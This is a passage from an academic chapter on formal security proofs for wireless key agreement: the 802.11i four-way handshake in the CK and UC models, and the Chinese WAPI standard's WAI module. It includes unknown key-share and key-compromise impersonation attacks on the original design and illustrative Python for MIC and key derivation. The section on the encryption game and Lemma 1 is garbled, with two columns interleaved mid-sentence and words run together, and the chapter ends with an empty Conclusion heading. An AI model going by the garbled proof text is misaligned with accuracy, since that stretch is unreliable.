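            + nonce                                  # 32-byte key nonce
            + bytes(16)                              # EAPOL-Key IV
            + bytes(8)                               # key RSC
            + bytes(8)                               # reserved
            + bytes(MIC_LEN)                         # key MIC, zero until attached
            + len(key_data).to_bytes(2, "big")
            + key_data)
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body  # EAPOL v2, type 3 = EAPOL-Key


def compute_mic(kck: bytes, frame: bytes) -> bytes:
    """The MIC is calculated with KCK only, which is just the first part of the PTK."""
    zeroed = frame[:MIC_OFFSET] + bytes(MIC_LEN) + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def attach_mic(kck: bytes, frame: bytes) -> bytes:
    return frame[:MIC_OFFSET] + compute_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


def verify_mic(kck: bytes, frame: bytes) -> bool:
    """Receiver-side check: recompute over the zeroed frame, compare in constant time."""
    return hmac.compare_digest(compute_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN])


if __name__ == "__main__":
    # Constructed sample values (not from any real handshake).
    pmk = hashlib.sha256(b"constructed PMK seed").digest()
    aa, spa = bytes.fromhex("02000000aa01"), bytes.fromhex("02000000bb02")
    anonce, snonce = bytes([0x11]) * 32, bytes([0x22]) * 32
    ptk_a = derive_ptk(pmk, aa, spa, anonce, snonce)   # authenticator's view
    ptk_s = derive_ptk(pmk, spa, aa, snonce, anonce)   # supplicant's view, arguments swapped
    print("both sides derive the same PTK:", ptk_a == ptk_s)
    kck, kek, tk = split_ptk(ptk_a)
    msg2 = attach_mic(kck, eapol_key_frame(0x010A, 1, snonce, b"constructed RSN IE"))
    print("msg2 MIC verifies with KCK:", verify_mic(kck, msg2))
    print("msg2 MIC rejected with KEK:", not verify_mic(kek, msg2))
```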


The Security Analysis of Protocol 4WHSAM

Theorem 6. If the pseudorandom function f is secure against chosen message attacks, the protocol 4WHSAM is SK-secure without PFS in the AM.

Proof. The protocol 4WHSAM is based on a pre-shared key, from which the session key kij is generated, thus it cannot provide the security attribute of perfect forward secrecy (PFS). According to the model mentioned previously, let the session never expire.

To see that the first requirement of Definition SK-security is satisfied, according to the definition of the AM, note that if both pi and pj are uncorrupted during the exchange of the key and both complete the protocol, then they both get the uncorrupted ri and rj, and thus establish the same key, which is prf_kij(ri, rj). So the protocol 4WHSAM satisfies property 1 of Definition SK-security.

Then we prove that the second property of Definition SK-security is also satisfied by protocol 4WHSAM. Assume there is a KE-adversary A in the AM against protocol 4WHSAM that has a non-negligible advantage ε in guessing b correctly. We can construct an algorithm D that distinguishes a pseudorandom function from a random function with non-negligible probability ε. Let Q0 = {r, t, prf_k(r, t)} and Q1 = {r, t, random()}. The input to D is denoted by {r, t, γ} and is chosen from Q0 or Q1 each with probability 1/2. Let l be an upper bound on the number of sessions invoked by A in any interaction. Algorithm D uses adversary A as a subroutine and is described as follows.

1. Choose m ←R {1, ..., l}.
2. Invoke A on a simulated interaction in the AM with parties p1, ..., pn running 4WHSAM. Each of the parties shares prf_kij(·) with the other one, except for the two in the m-th session, who share prf_k(·).
3. Whenever A activates a party to establish a new session (except for the m-th session) or to receive a message, D follows the instructions of 4WHSAM on behalf of that party. When a party is corrupted or a session (other than the m-th session) is exposed, hand A all the information corresponding to that party or session as in a real interaction.
4. When the m-th session, say (pi, pj, sm), is invoked within pi, let pi send the message (pi, sm, r) to pj.
5. When pj is invoked to receive (pi, sm, r), let pj send the message (pj, sm, t) to pi.
6. If session (pi, pj, sm) is chosen by A as the test-session, then provide A with γ as the answer to this query.
7. If the m-th session (pi, pj, sm) is ever exposed, or if a session different from the m-th session is chosen as the test-session, or if A halts without choosing a test-session, then D outputs b' ←R {0,1} and halts.
8. If A halts and outputs a bit b', then D halts and outputs b' too.

The run of A by D (up to the point where A stops or D aborts A's run) is identical to a normal run of A against protocol 4WHSAM.

Consider the first case, in which the m-th session is chosen by A to be tested and A gets the response γ. Thus, if the input to D came from Q0, then the response was the actual value of the key. On the other hand, if the input to D came from Q1, then the response to the test query was a random value. As mentioned above, the input to D was chosen with probability 1/2 from Q0 and Q1. Then the distribution of responses provided by D to the test query of A is the same as specified by Definition SK-security. In this case, the probability that A guesses correctly whether the test value was "real" or "random" is 1/2 + ε for a non-negligible value ε. This is equivalent to guessing whether the input to the distinguisher D came from Q0 or Q1, respectively. Thus, by outputting the same bit b' as A, we get that the distinguisher D guesses the input distribution Q0 or Q1 correctly with the same probability 1/2 + ε as A did.

Now consider the second case, in which (pi, pj, sm) is not chosen by A. In this case, D always halts and outputs a random bit, thus its probability of guessing the input distribution Q0 or Q1 correctly is 1/2.
Since the first case happens with probability 1/l, while the second case happens with probability 1 − 1/l, the overall probability of D guessing correctly is

$$PR = \frac{1}{l}\left(\frac{1}{2} + \varepsilon\right) + \frac{1}{2}\left(1 - \frac{1}{l}\right) = \frac{1}{2} + \frac{\varepsilon}{l}.$$

Thus D succeeds in distinguishing Q0 from Q1 with non-negligible advantage, which conflicts with the assumption that the pseudorandom function is secure. So the protocol 4WHSAM satisfies property 2 of Definition SK-security. Thus the protocol 4WHSAM is SK-secure without PFS in the AM. #

Authenticator λprf

Theorem 7. Assume that the pseudorandom function and MAC in use are secure against chosen message attacks. Then protocol λprf emulates protocol MT in unauthenticated networks (Fan et al., 2007).

The Security Analysis of Four-Way Handshake Protocol in the UM

We have proved that the protocol 4WHSAM is SK-secure without PFS in the AM, and the protocol λprf is an MT-authenticator, thus we get the result of the security analysis of 4WHS in the UM.

Theorem 8. If the pseudorandom function and MAC function in use are secure against chosen message attacks, the protocol four-way handshake is SK-secure in the UM.

The Four-Way Handshake Protocol is UC-Secure

We have proved that 4WHS is SK-secure. According to Definition 6, we now prove that it has the ACK property, and thus also satisfies the definition of UC-secure.

Theorem 9. The protocol 4WHS has the ACK property.

Proof. To prove the ACK property for 4WHS, we construct the following internal state simulator I. Recall that before 4WHS actually generates output, the local state of the first party (pi in the aforementioned description) consists of (k1, k2, s, pi, pj). The internal state of the other party (pj in the aforementioned description) is identical (its internal state, like k0, has been erased). The output of I, given (k1, s, pi, pj), will be lpi = lpj = (k1, rI, s, pi, pj), where rI is a random value of the same length as k2. (Consequently, when the internal states of pi and pj are replaced with lpi and lpj respectively, the added protocol message will be computed and verified as MAC_rI(s, ri) rather than MAC_k2(s, ri).) Next we prove that I is a good internal state simulator.

Let F be an ideal functionality which can securely realize key exchange and A be an adversary. If I is not a good internal state simulator, then the environment Z can distinguish between an interaction with A and 4WHS and an interaction with A and the above transformed protocol (replace the internal states of pi and pj with the outputs of I) with a non-negligible advantage. The only difference between the protocol resulting from the aforementioned transformation and 4WHS is the replacement of k2 with rI. So if I is not a good internal state simulator, then Z can distinguish between rI and k2 with a non-negligible advantage. If the adversary can distinguish between k2 and a random value with a non-negligible advantage, where k2 = second_n2(k0), then he/she can distinguish between k0 and a random value with a non-negligible advantage. As we have proved that 4WHS is SK-secure, the adversary cannot distinguish between k1 (k1 = first_n1(k0)) and a random value with a non-negligible advantage, and then he/she cannot distinguish between k0 and a random value with a non-negligible advantage, which reaches a contradiction. So the environment Z cannot distinguish between an interaction with (A, 4WHS) and (A, the transformed protocol) with a non-negligible advantage, thus we have HYB_{F,A,Z} ≈ HYB_{F,A,Z,I}, and I is a good internal state simulator for 4WHS. According to Definition 6 and Theorem 1, we know that 4WHS has the ACK property and is UC-secure. #
According to Theorems 8, 9, and 1, we get Theorem 10.

• Theorem 10: If the pseudorandom function and MAC function in use are secure against chosen message attacks, the protocol four-way handshake is UC-secure. #

THE SECURITY ANALYSIS OF CHINESE WLAN SECURITY STANDARD WAPI WITH THE CK MODEL

The Chinese WLAN standard WAPI (GB 15629.11-2003) (National Standard of the People's Republic of China, 2003), the first issued Chinese standard in the field of WLAN, has been formally implemented since November 1, 2003. WAPI is composed of two parts: WAI and the wireless privacy infrastructure (WPI). They realize the identity authentication and data encryption, respectively. In March of 2004, the China IT Standardization Technical Committee drafted a new version, the WAPI implementation plan (National Standard of the People's Republic of China, 2004), which improves the original standard WAPI. Compared with the original standard, the greatest change the implementation plan made lies in the WAI module.

As a national standard which is about to be deployed and implemented on a large scale, its security is undoubtedly the focus. But as far as we know, up to now there are no articles that systematically analyze the security of WAPI and its implementation plan, which is imperfect for a national standard. This contribution discusses the security of WAPI and its implementation plan with the CK model. It has three contributions: (1) the security weaknesses of WAI in WAPI are given; (2) the WAI module in the implementation plan is proved secure in the CK model; and (3) how the implementation plan overcomes the security weaknesses of the original WAPI is pointed out. The analysis results can help us understand the necessity of the implementation plan and enhance confidence in it. At the same time, as a case study, the analysis is helpful for the design of a secure key-agreement protocol.

WAIs in WAPI and its Implementation Plan

WAI adopts a port-based authentication architecture that is identical with IEEE 802.1X. The whole system is composed of the mobile guest STA, the access point (AP), and the authentication service unit (ASU).

WAI in WAPI

The interaction procedure of WAI in the original national standard WAPI is shown in Figure 4. From this figure, we can see that WAI is composed of two parts: certificate authentication and key agreement.

Figure 4. WAI in WAPI (participants STA, AP, ASU; certificate authentication: Authentication Activation, Access Authentication Request, Certificate Authentication Request, Certificate Authentication Response, Access Authentication Response; key agreement: Key Agreement Request, Key Agreement Response)
1. Certificate authentication. In this process, the station (STA) sends its public key certificate and access request time to the access point (AP) in the access authentication request. AP sends its certificate, STA's certificate, STA's access request time, and its signature on them to the authentication service unit (ASU) in the certificate authentication request. After ASU validates AP's signature and the two certificates, it sends the certificate validation result, STA's access request time, and ASU's signature on them to STA and AP.

2. Key agreement. First, STA and AP negotiate the cryptography algorithms. Then, they respectively generate one random value, r1 and r2. These random values are encrypted with the peer's public key and sent to each other. Both parties decrypt the encrypted random values and derive the session key K = r1 ⊕ r2. The key agreement process is shown in Figure 5, where ENC() is the encryption function, and PKAP and PKSTA are AP's and STA's public keys respectively.

Figure 5. The key agreement in the WAI of WAPI

WAI in the Implementation Plan

In the framework, WAI in the implementation plan is the same as that of the original WAPI, and it is also composed of certificate authentication and key agreement. Compared with the original standard WAPI, the implementation plan remains unchanged in the certificate authentication, but makes a rather big improvement in the key agreement. The new key-agreement protocol is shown in Figure 6. It is different from the original one in the following points:

1. In the implementation plan, the key agreement request has to be initiated by AP. At the same time, the secure parameter index SPI, and AP's signature on the encrypted random value and SPI, are included in this request. The signature algorithm is ECDSA.
2. In the key agreement response, SPI and the STA's MAC on the encrypted random value and SPI are included. The MAC is computed through the HMAC-SHA256 algorithm.
3. The key derivation method is different. STA and AP first calculate the host key k = r1 ⊕ r2, then extend k with the KD-HMAC-SHA256 algorithm to get the session key kd, the authentication key ka and the integrity check key.

The Security Weaknesses of WAI in WAPI

The WAI module in the original WAPI has several security weaknesses as follows:

1. Its key-agreement protocol cannot resist the unknown key-share (UKS) attack (Burton & Kaliski, 2001).

We assume that an attacker E gets a certificate where his/her public key PKE is the same as PKSTA. (In many practical settings, the certificate authority [CA] does not require a proof-of-possession of the corresponding private key from a registrant of a public key (Krawczyk, 2005), so an attacker E can get a certificate from the CA in which his/her public key is the same as STA's.) In addition, in the certificate authentication process, ASU just verifies the authenticity and validity of E's certificate, so E also can pass the certificate authentication and he/she can launch the unknown key-share attack in the key agreement. When STA sends the first message ENC(PKAP, r1), E forwards this message to AP and claims that this message is from E. Then AP replies with ENC(PKE, r2). E forwards this message to STA. When the protocol completes, STA thinks that he/she agreed upon a key with AP, while AP thinks that he/she negotiated a key with E. And these two keys are the same. So, the attacker E succeeds in the UKS attack.
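The implementation plan's key agreement (points 1 to 3 above) and the SPI binding that the UKS scenario turns on, as an added example that is not the standard's or the chapter's code. Assumptions: the page gives no internal construction for KD-HMAC-SHA256, so a single HMAC-SHA256 call with a constructed label stands in for it; ENC(PK, r) is not modelled (the ciphertext fed to the MAC is a constructed opaque byte string); AP's ECDSA signature on the request is omitted.

```python
"""Key agreement of WAI in the WAPI implementation plan: host key k = r1 xor r2,
KD-HMAC-SHA256 expansion into kd and ka, and STA's HMAC-SHA256 over the
encrypted random value and the SPI.

Added example; not code from the standard or the chapter.  Assumptions: the
KD-HMAC-SHA256 stand-in below is a single HMAC-SHA256 with a constructed label;
ENC(PK, r) is not modelled; AP's ECDSA signature is omitted; kd and ka are the
first and last 16 bytes of the expansion, as the page's first()/last() state.
"""
import hashlib
import hmac


def spi(sta_mac: bytes, ap_bssid: bytes, auth_time: bytes) -> bytes:
    """SPI = the MAC of the STA || the BSSID of the AP || the time of the
    authentication request (Figure 6)."""
    return sta_mac + ap_bssid + auth_time


def kd_hmac_sha256(k: bytes) -> bytes:
    """Stand-in for KD-HMAC-SHA256 (assumption): 32 bytes of HMAC-SHA256 keyed by k."""
    return hmac.new(k, b"constructed WAI key expansion label", hashlib.sha256).digest()


def derive_keys(r1: bytes, r2: bytes):
    """Host key k = r1 xor r2; kd = first 16 bytes and ka = last 16 bytes of the expansion."""
    k = bytes(a ^ b for a, b in zip(r1, r2))
    material = kd_hmac_sha256(k)
    return k, material[:16], material[-16:]


def response_mac(ka: bytes, enc_r2: bytes, spi_value: bytes) -> bytes:
    """STA's MAC in the key agreement response: HMAC-SHA256 with ka over the
    encrypted random value and the SPI."""
    return hmac.new(ka, enc_r2 + spi_value, hashlib.sha256).digest()


def run_key_agreement(sta_mac, ap_bssid, auth_time, r1, r2, peer_mac_seen_by_ap):
    """One run with both sides' views.  STA builds the SPI from its own MAC address;
    AP builds it from the address of the station it believes it is talking to.
    Returns (session keys equal, AP accepts STA's MAC)."""
    enc_r2 = b"constructed ENC(PK_STA, r2) stand-in"   # not real encryption
    # STA side: has r2 (decryption is not modelled), derives keys, sends the MAC.
    _, kd_sta, ka_sta = derive_keys(r1, r2)
    mac_from_sta = response_mac(ka_sta, enc_r2, spi(sta_mac, ap_bssid, auth_time))
    # AP side: same host key, but the SPI carries the peer identity AP believes in.
    _, kd_ap, ka_ap = derive_keys(r1, r2)
    expected = response_mac(ka_ap, enc_r2, spi(peer_mac_seen_by_ap, ap_bssid, auth_time))
    ap_accepts = hmac.compare_digest(expected, mac_from_sta)
    return kd_sta == kd_ap, ap_accepts


if __name__ == "__main__":
    # Constructed sample addresses, time and random values.
    sta = bytes.fromhex("001122334455")
    ap = bytes.fromhex("66778899aabb")
    e = bytes.fromhex("ccddeeff0011")
    t = b"2004-03-01T12:00:00"
    r1, r2 = bytes(range(16)), bytes(range(16, 32))
    print("honest run (keys equal, AP accepts):",
          run_key_agreement(sta, ap, t, r1, r2, peer_mac_seen_by_ap=sta))
    # In the original WAPI the only thing derived is K = r1 xor r2, so a run in which
    # AP believes its peer is E still ends with equal keys on both sides.  With the
    # SPI inside the MAC, equal keys are not enough: AP's check fails.
    print("AP believes its peer is E (keys equal, AP accepts):",
          run_key_agreement(sta, ap, t, r1, r2, peer_mac_seen_by_ap=e))
```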


Figure 6. The key-agreement protocol in WAI of the implementation plan

SPI = the MAC of the STA || the BSSID of the AP || the time of authentication request

Let us analyze this attack in the CK model. In the previous attack, the KE-adversary chooses the session in STA as the test session and exposes the session in AP (because these two sessions are not matching sessions, the session in AP can be exposed). Because STA and AP get the same session key, the KE-adversary can completely get the session key of the test session. According to Definition 2, this protocol is not SK-secure. And Diffie et al. (1992) can be referred to for the consequences of this attack.

2. Its key agreement protocol cannot resist the key-compromise impersonation (KCI) attack.

Let us analyze this attack in the CK model. First, we assume that STA's private key is compromised and the attacker chooses the session in STA as the test session after STA completes the matching sessions with AP. The attacker can corrupt another mobile guest STA' and impersonate him/her to send the message ENC(PKAP, r1) to AP. We denote the session between STA' and AP as SID'. When AP receives this message from STA', he/she chooses another random value r3 and responds with ENC(PKSTA', r3). AP computes its session key of SID' as k' = r1 ⊕ r3. The attacker can expose this session and get k' (this session is not the matching session of the test session). In addition, the attacker can decrypt ENC(PKSTA', r3) to get r3. Thus he/she can get r1 = k' ⊕ r3. In addition, the attacker can also decrypt ENC(PKSTA, r2) to get r2. Then he/she can get the session key of the test session: k = r1 ⊕ r2. Thus the attacker can impersonate AP to STA. According to Definition 2, this protocol is not SK-secure.

3. It does not realize the explicit identity authentication of STA and may lead to faulty charging.

From the WAI process, we can see that it does not realize the explicit identity authentication of STA to AP. An attacker can pass the certificate authentication and access the network as long as he/she gets a legal user's certificate, which will lead to faulty charging if the network charges the fee according to the access time.

The Security Analysis of WAI in the Implementation Plan

In the certificate authentication, AP first makes a signature in the certificate authentication request and ASU makes a signature in the certificate authentication response. Both these signatures include STA's access request time, which ensures the freshness of the signatures. Therefore ASU can authenticate AP's identity and STA can authenticate ASU's identity. In addition, STA trusts ASU. So STA can authenticate the identity of AP after the certificate authentication. At the same time, AP authenticates the certificate provided by STA.

The key-agreement protocol in WAI of the implementation plan is denoted by π. In the following,

The Provably Secure Formal Method

we will prove that is SK-secure without PFS


the value encrypted by G in phase 0. If b=1then
(Güther, 1990). That is, the protocol is SK-secure,
G responds with a random string s* of the same
but does not provide perfect forward secrecy of the
length as HMAC-SHA256k '' (t * ).
sessionkeys.InordertoprovethatisSK-secure, a
Phase 3: Same as Phase 1.
wedefinea“game”asfollows.
Phase 4: B outputs a bit b’ as the guess of b.
And the winner is…B if and only if b=b’.
The Design of an Encryption Game The following notes are made about the
game:
Let (G, ENC, DEC) be a key-generation, encryp-
tion and decryption algorithm, respectively, of a
1. The challenging ciphertext c* in the phase 0
public-key encryption scheme that is secure against
is also the ciphertext sent by AP in the key
CCA2 attack (Wenbo, 2004). Let K be the security
agreementrequestof.
parameter. STA and AP have invoked G(K) to get
2. In Phase 1, B randomly chooses a test cipher-
their public and private key pairs.
text c, random value r and string t, and sends
This game integrates the CCA2-security of
them to G for process. It should be noticed
ENC with the key-agreement protocol (Canetti &
that B cannot simultaneously chooses c* and
Krawczyk, 2001; Wenbo, 2004). We will proceed to
t* as the input of G .
show that if an attacker can break the SK-security
3. B keeps r unchanged in every triple in order
of p , then he/she can win the game, that is, he/she
toreducethedifficultyoftheattack.
can break the CCA2-security of ENC.
The two participants in the game are G and B
Security Analysis of Key-Agreement
(for good and bad). G is the party against which
B plays the game. G acts as a decryption oracle. G Protocol in WAI
possesses a pair of public and private keys, PKSTA
and SKSTA (generated via the key generation algo- According to Definition 2, in order to prove that
rithm G). B is the attacker of protocolis , he/SK-she
secure,wehavetoarguethatitcanmeet
knows PKSTA but not SKSTA. He/she leverages the two requirements. The first one is that STA and
abilitieshe/shegetsintheattackof APto can get a same
take part session key after they complete
in this game. The game process is shown in the matching sessions. The second one is that B can-
following: not distinguish the session key kd from a random
value with a non-negligible advantage. In the fol-
Phase 0: G provides B with a challenge cipher- lowing, we will prove that can meet these two
*
text c =ENC(PKSTA,r1) for r1← K requirements.
R
 {0,1} .
Phase 1: B sends a triple (c, r, t) to G who Lemma 1. If the encryption scheme ENC is
responds with HMAC- SHA256ka (t). secure against the CCA2 attack, then at the end
( k a = l a s t ( K D - H M AC - S H A 2 5 6 ( k ' )) ,
' of protocol , STA and AP will complete matching
k ' = r ⊕ r ', r ' = DEC ( SK STA , c). The last( ) is a sessions and get a same session key.
function that extract out the last 16 bytes from a Proof. Since the signature algorithm ECDSA
bit string.) This is repeated a polynomial number of is secure against existential forgery by adaptive
times with each triple being chosen adaptively by B chosen-message attack (Brown, 2001), in addition,
(i.e., after seeing G ’s response to previous triple), SPI in the key agreement request can guarantee the
but he/she keeps r unchanged in every triple. freshness of this message and bind this message
Phase 2: B sends a test string t* =(SPI|| PK AP (r)) with the two communication parties, the attacker
to G . Then G chooses a random bit cannot forge or modify the request message.
b← R
 {0,1}. If b=0 then G responds with In addition, the attacker B cannot forge a key
HMAC-SHA256k '' (t )where ka = last
* '' agreement acknowledgment message. Let us prove
(KD-HMAC-SHA256( k '' ) , k '' = r ⊕ r, r is
a this with the reduction to absurdity. It is assumed
1 1


that the attacker can forge an acknowledgment message with a non-negligible probability during the run of the protocol π. That is, he/she can choose a random value (say r3) and forge a message authentication code that AP can validate. Then B takes advantage of this ability to run the game above. In Phase 1, he/she also chooses r3 as the random value r in the triple, while selecting c and t randomly. Then, in Phase 2, he/she can work out HMAC-SHA256_{ka''}(t*), because this value is the same as the forged message authentication code in the key agreement acknowledgment. Therefore the attacker can distinguish HMAC-SHA256_{ka''}(t*) from s* and guess b correctly in Phase 4, thus winning the game, which indicates that the encryption scheme is not CCA2-secure. This contradicts the presupposition. So during the run of the protocol π, the attacker cannot forge a key agreement acknowledgment with a non-negligible probability.

Therefore STA and AP will complete matching sessions and get the same session key at the end of protocol π, if ENC is CCA2-secure. #

Lemma 2. If the encryption scheme ENC is secure against the CCA2 attack, the attacker cannot distinguish the session key kd from a random value with a non-negligible advantage.

Proof. It is assumed that the attacker B can distinguish the session key kd from a random value with a non-negligible advantage ε1. In the CK model, the KE-attacker is not permitted to corrupt the test session or its matching session, so the attacker B cannot directly get the session key kd from the attack of π. While kd = first(KD-HMAC-SHA256(k)) (the first() is a function that extracts the first sixteen bytes from a bit string), the attacker B has only two possible methods to distinguish kd from a random value. The first one: B learns k. The second one: B succeeds in forcing the establishment of a session (other than the test session or its matching session) that has the same key as the test session. In this case B can learn the test session key by simply querying the session with the same key, and without having to learn the value k. In the following, we prove that neither of these two methods is feasible.

The first method means that, from the attack of π, the attacker can distinguish the host key k from a random value with a non-negligible advantage. Based on this ability, B also can distinguish k'' = r1 ⊕ r from a random value with a non-negligible advantage. This is because r in k'' is selected by the attacker himself, which makes the difficulty of distinguishing k'' from a random value no bigger than that of distinguishing k from a random value. It is assumed that the advantage with which B distinguishes k'' from a random value is ε2; then ε2 ≥ ε1. And because ka'' = last(KD-HMAC-SHA256(k'')), B can get ka''. Further, he/she can work out HMAC-SHA256_{ka''}(t*) with a non-negligible probability, which enables the attacker to win the encryption game. That means the encryption scheme is not secure against the CCA2 attack. This contradicts the presupposition. So the attacker B cannot get k with a non-negligible probability. Then this method is not practical.

As for the second method, there are two strategies that the attacker can take. (1) After STA and AP complete the matching sessions, the attacker B establishes a new session with AP or STA. But the session key of this session will not be kd, because the encrypted random value is chosen randomly by AP or STA. (2) When AP and STA perform the key agreement, B intervenes in this negotiation and makes them get the same session key without the completion of the matching sessions. That is, STA and AP get the same session key but they do not complete matching sessions. Then the attacker can get the test session key by breaking the unmatched session that has the same session key. But from Lemma 1, we know that if the encryption scheme ENC is secure against the CCA2 attack, B cannot succeed in this intervention. So this method is not feasible either.

Let us sum up the previous analysis. The attacker B can neither get the host key k, nor force the establishment of a new session with STA or AP that has the same session key as the test session. So the attacker cannot distinguish the session key kd from a random value with a non-negligible advantage. #

Theorem 11. If the encryption scheme ENC adopted is secure against the CCA2 attack, then π is SK-secure without PFS.
0
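The key derivation that Lemma 2 leans on, kd = first(KD-HMAC-SHA256(k)) and ka = last(KD-HMAC-SHA256(k)), together with the acknowledgment tag HMAC-SHA256_{ka}(t), can be exercised in a few lines. The Python below is an added example, not code from the chapter or from the WAPI standard: the host key is modelled as the XOR of the two exchanged random values, KD-HMAC-SHA256 is replaced by a simple chained HMAC-SHA256 expansion (the standard's exact construction is not reproduced; only the first()/last() split matters here), and the random values and acknowledgment body are constructed for the demonstration.

```python
import hashlib
import hmac

SESSION_KEY_LEN = 16  # first() takes the first sixteen bytes, as in the proof


def kd_hmac_sha256(key: bytes, label: bytes, length: int) -> bytes:
    """Stand-in for KD-HMAC-SHA256: expand `key` to `length` bytes by chaining
    HMAC-SHA256 over a label and a counter. Assumption: this is an illustrative
    expansion, not the standard's construction."""
    out, block, ctr = b"", b"", 0
    while len(out) < length:
        block = hmac.new(key, block + label + bytes([ctr]), hashlib.sha256).digest()
        out += block
        ctr += 1
    return out[:length]


def host_key(r1: bytes, r2: bytes) -> bytes:
    """Host key as the XOR of the two exchanged random values (the proof writes
    k'' = r1 XOR r0); a modelling assumption for this example."""
    if len(r1) != len(r2):
        raise ValueError("random values must have equal length")
    return bytes(a ^ b for a, b in zip(r1, r2))


def derive_keys(k: bytes):
    """kd = first(KD-HMAC-SHA256(k)), ka = last(KD-HMAC-SHA256(k))."""
    km = kd_hmac_sha256(k, b"session key and message authentication key",
                        2 * SESSION_KEY_LEN)
    return km[:SESSION_KEY_LEN], km[SESSION_KEY_LEN:]


def ack_tag(ka: bytes, t: bytes) -> bytes:
    """HMAC-SHA256_ka(t): the tag carried in the key agreement acknowledgment."""
    return hmac.new(ka, t, hashlib.sha256).digest()


def verify_ack(ka: bytes, t: bytes, tag: bytes) -> bool:
    # Constant-time comparison, so the verifier leaks nothing through timing.
    return hmac.compare_digest(ack_tag(ka, t), tag)


# Constructed random values standing in for r1 (from STA) and r2 (from AP).
R1 = bytes.fromhex("00112233445566778899aabbccddeeff")
R2 = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")
T = b"constructed key agreement acknowledgment body"


def demo():
    k = host_key(R1, R2)
    kd, ka = derive_keys(k)
    tag = ack_tag(ka, T)
    # A party without k (modelled as a host key differing in one byte) derives
    # unrelated kd/ka and so cannot produce or verify the acknowledgment tag.
    k_wrong = bytes([k[0] ^ 1]) + k[1:]
    kd_wrong, ka_wrong = derive_keys(k_wrong)
    return {
        "kd_len": len(kd),
        "ka_len": len(ka),
        "ack_ok": verify_ack(ka, T, tag),
        "ack_rejects_wrong_key": not verify_ack(ka_wrong, T, tag),
        "ack_rejects_tampered": not verify_ack(ka, T + b"x", tag),
        "kd_differs_for_wrong_k": kd_wrong != kd,
    }
```

The point the proof makes is visible in the structure: the session key and the MAC key are both outputs of a one-way expansion of k, so a session state consisting of (kd, ka) gives the holder no route back to k or to the random values, and a forged acknowledgment requires ka itself.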
The Provably Secure Formal Method

Proof. According to Lemma 1 and Lemma 2, we know that STA and AP will get the same session key after the key agreement and the attacker cannot distinguish the session key from a random value with a non-negligible advantage. Then, in accordance with Definition 2, the protocol is SK-secure.

In addition, if the private keys of STA and AP are compromised, the attacker can get the random values exchanged and can work out all the session keys that have been agreed upon. Thus this protocol cannot provide PFS. So we get that the key-agreement protocol is SK-secure without PFS. #

The Implementation Plan Overcomes the Weaknesses of the Original WAPI

We know that WAI in the original WAPI has some security weaknesses. But WAI in the implementation plan is secure in the CK model, and according to Li et al. (2005), the WAI module of the implementation plan can resist the KCI attack and the UKS attack. In the following, we will analyze how the implementation plan overcomes the security weaknesses in the original WAPI.

1. The key-agreement protocol in the implementation plan can resist the UKS attack. In the implementation plan, even though the attacker B gets a certificate in which his/her public key is the same as STA's or AP's, he/she cannot launch the UKS attack. Because the implementation plan requires that the key agreement request be sent by AP, STA only accepts the request from AP. So B can only launch the UKS attack against the AP (i.e., AP thinks that it agrees upon a key with B, but in fact it negotiates a key with STA, while STA correctly thinks that it negotiates a key with AP); that is, B can only forward the key agreement request message intended for him/her to STA. But in this request, AP's signature includes the SPI, which includes the MAC address of B, so STA will not accept this request forwarded from B. Therefore the key-agreement protocol in WAI of the implementation plan can resist the UKS attack. From the previous analysis, we can see that the essential reasons that WAI in the implementation plan can resist the UKS attack are that: (1) the implementation plan requires that the key agreement request be sent from AP; (2) AP's signature includes the SPI, which includes the destination entity's address.

2. The key-agreement protocol in the WAI of the implementation plan can resist the KCI attack. KCI attacks on the protocol have two manners. The first one is that AP's private key is compromised and the attacker can impersonate STA to AP. The second one is that STA's private key is compromised and the attacker can impersonate AP to STA. In the following, we will discuss these two cases respectively.

If AP's private key is compromised, the attacker can decrypt ENC(PK_AP, r2) to get r2. In order to get r1, he/she has only two possible methods: (1) attack the encryption algorithm ENC; and (2) impersonate another entity to establish another session with STA, send ENC(PK_STA, r1) to STA, and then expose this session and get r1 through some computations. But neither of these two methods is feasible. For the first method, we know that if the encryption algorithm ENC is CCA2 secure, the attacker cannot get r1 from an attack on this algorithm directly. As for the second method, the implementation plan requires the key agreement request be sent by AP, and the attacker cannot forge AP's signature, so the attacker cannot impersonate another entity to establish another session with STA. Therefore the attacker cannot get r1. Then he/she still cannot get the host key k and the session key kd.

If STA's private key is compromised, the attacker can decrypt ENC(PK_STA, r1) to get r1. In order to get r2, he/she has only two possible methods: (1) attack the encryption algorithm ENC directly to get r2; and (2) impersonate another mobile guest STA' to establish a new session with AP and send it ENC(PK_AP, r2) in the key agreement acknowledgement. From the previous analysis we get that the first method is infeasible. As for the second method, because r2 and the host key k are just ephemeral values, we assume that they are not part of the session state of AP. Therefore, the session state of the new session in AP consists only of the session key kd*, the message authentication key ka* and the
message integrity key. The attacker cannot get any information about r2 from this session state because these three keys are hash values of the host key k*. Therefore the attacker cannot get r2 either. (If the session key were not a hash value of k*, the attacker could get k*, and further could get r2.) So the attacker still cannot get the host key k and the session key kd.

As a whole, the essential reasons that the key-agreement protocol can resist the KCI attack are that: (1) the implementation plan requires that the key agreement request be sent by AP; and (2) the session key in the implementation plan is derived through the hash function.

3. The WAI module in the implementation plan realizes mutual explicit identity authentication between STA and AP, which can withstand faulty charge. For AP, the protocol is an explicit key authentication protocol, so AP can authenticate the identity of STA at the end of WAI. At the same time, STA can authenticate the identity of AP in the certificate authentication. Therefore WAI in the implementation plan realizes mutual explicit identity authentication between AP and STA, and so it can withstand faulty charge.

Future Trends

In the future, possible research "hot" points in the formal analysis of key-agreement protocols include: (1) reducing the basic assumptions of the protocol, such as the "perfect" cryptography assumption and the free encryption assumption, so that the theoretical research is closer to practice; (2) extension of the protocol analysis scope; (3) enhancement of the analysis capability for "protocol composition," which is the "hot" and difficult point; (4) integration of the characteristics of different analysis methods, such as the comparison and combination of the CSP model, the strand space model, model checking methods, and linear logic methods; (5) research on the automatic generation and checking of security protocols; (6) research on the case in which the number of parties is indefinitely increased; (7) a solution to the "state explosion" problem in model checking methods; and (8) research in new areas, such as the DoS attack.

Conclusion

